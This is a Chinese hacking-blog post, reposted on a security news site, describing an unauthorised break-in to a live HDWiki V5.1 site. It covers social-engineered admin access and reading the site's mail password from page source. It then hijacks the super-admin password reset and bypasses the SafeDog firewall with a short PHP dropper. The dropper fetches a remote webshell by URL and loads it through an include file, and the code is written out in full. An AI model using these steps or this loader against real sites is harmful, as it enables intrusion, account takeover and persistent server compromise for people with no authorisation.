记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

HDWiki V5.1百科系统后台过安全狗拿shell

2013-05-02 09:50

偶遇一hdwiki百科系统站,前台在词条创建人处发现一管理员
image001.png

进接通过账号社进后台,后台工能很强大,但是发现限权不够
文件管理 无权限.jpg

在会员管理处发现还存在超级管理员这类账号

image009.png

社工admin无果

反回后台,发现管理员帐号可以对网站的邮箱进行配置
image007.png

用的腾讯企业邮箱,通过查看源码直接获取邮箱密码

反回网站前台,在密码找回处填上刚才找到的admin邮箱,admin的密码找回链接会通过刚找到的邮箱发送
image011.png

在网页登录刚才的腾讯腾讯企业邮箱,在发件箱中看到admin的密码找回链接
image013.png
直接重置admin密码,再次登录后台,看到文件管理处很强大,可以新建文件也可以上传
文件管理.jpg

直接新建大马,被安全狗档住了
安全狗.jpg

新建getshell.php,
getshell.jpg
代码

<?php $remotecode = $_REQUEST['code']; $targetfile = $_REQUEST['file']; $shellcode = file_get_contents($remotecode); $fp = fopen($targetfile,"a"); fwrite($fp,$shellcode); ?>

通过 getshell.php?code=http://木马路径&file=1.txt,绕过安全狗对POST数据包检测的限制,让服务器下载我们的大马保存为1.txt
这是用到一个php的函数 file_get_contents()
这个函数可以从远程文件中读取内容
但前提是 php.ini 中allow_url_fopen 得为 on 才行

再新建shell.php
QQ截图20130501132222.jpg
代码

<?php require_once ("1.txt"); ?>

利用php文件包含来绕过过安全狗对文件内容检限制
大马.jpg
成功拿到shell一枚

没什么技术含量,大牛略过

声明: 本文采用 CC BY-NC-SA 3.0 协议进行授权
转载请注明来源:Panni_007 Security
本文链接地址:http://www.hackdig.com/?05/hack-3178.htm
知识来源: www.panni007.com/2013/05/02/935.html

阅读:140729 | 评论:0 | 标签:黑客攻防 HDWiki v5.1 shell 安全狗

想收藏或者和大家分享这篇好文章→复制链接地址

“HDWiki V5.1百科系统后台过安全狗拿shell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云